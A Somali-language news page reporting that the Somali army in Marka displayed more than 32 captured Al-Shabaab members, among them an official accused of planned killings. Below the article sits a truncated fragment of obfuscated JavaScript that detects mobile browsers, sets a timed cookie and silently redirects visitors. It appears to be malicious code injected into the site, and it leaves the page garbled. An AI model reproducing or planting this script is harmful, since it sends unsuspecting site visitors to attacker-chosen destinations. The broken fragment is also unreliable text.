Sawirro:-Ciidanka Xoogga Dalka Oo Marko Ku Soo Bandhigay Xubno Ka Tirsan Al Shabaab

0
411

Ciidanka Xoogga dalka Soomaaliyeed ayaa hawlgallo ay ka sameeyeen gudaha iyo daafaha magaalada Marko ee xarunta gobolka Shabeellaha Hoose waxay ku soo qabteen xubno ka tirsan Ururka Al Shabaab.

Howlgalkaasi ayaa waxaa lagu soo qabtay in ka badan 32 xubnood oo isugu jirta saraakiil iyo dagaalyahano, kuwaasi oo dhammaantood qirtay ka mid ahaanshaha Al Shabaab, waxaana qaarkood Ciidanka Xoogga ay soo qabteen iyagoo ku howlan falal amniga lidi ku ah.

Goobta lagu soo bandhigay raggan la soo qabtay, ayaa waxaa ku sugnaa Abaanduullaha ciidanka Xoogga Dalka S/guuto Odowaa Yuusuf Raage oo ay wehliyaan xubno ka socday xafiiska Xeer ilaalinta Maxkamadda ciidamada qalabka sida.

Abaandullaha ciidanka xoogga dalka SoomaaliyaA� ayaa sheegay ragga Shabaab ka tirsan ee la soo qabtay ay qirteen ka mid ahaanshaha Al Shabaab, waxaana uu xusay in dhawaan Maxkamadda Ciidamada qalabka sida la soo taagayo.

Ragga la soo qabtay, ayaa waxaa ku jira Sarkaal sare oo Al Shabaab u qaabilsanaa fulinta dilalka qorsheysan ee ka dhaca magaaladda Marko, kaasi oo lagu magacaabo C/casiis Jamaal, waxaana uu qirtay inuu ka dambeeyey dilal badan oo loo geystay dad shacab ah oo aan waxba galabsan.

oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

LEAVE A REPLY

Please enter your comment!
Please enter your name here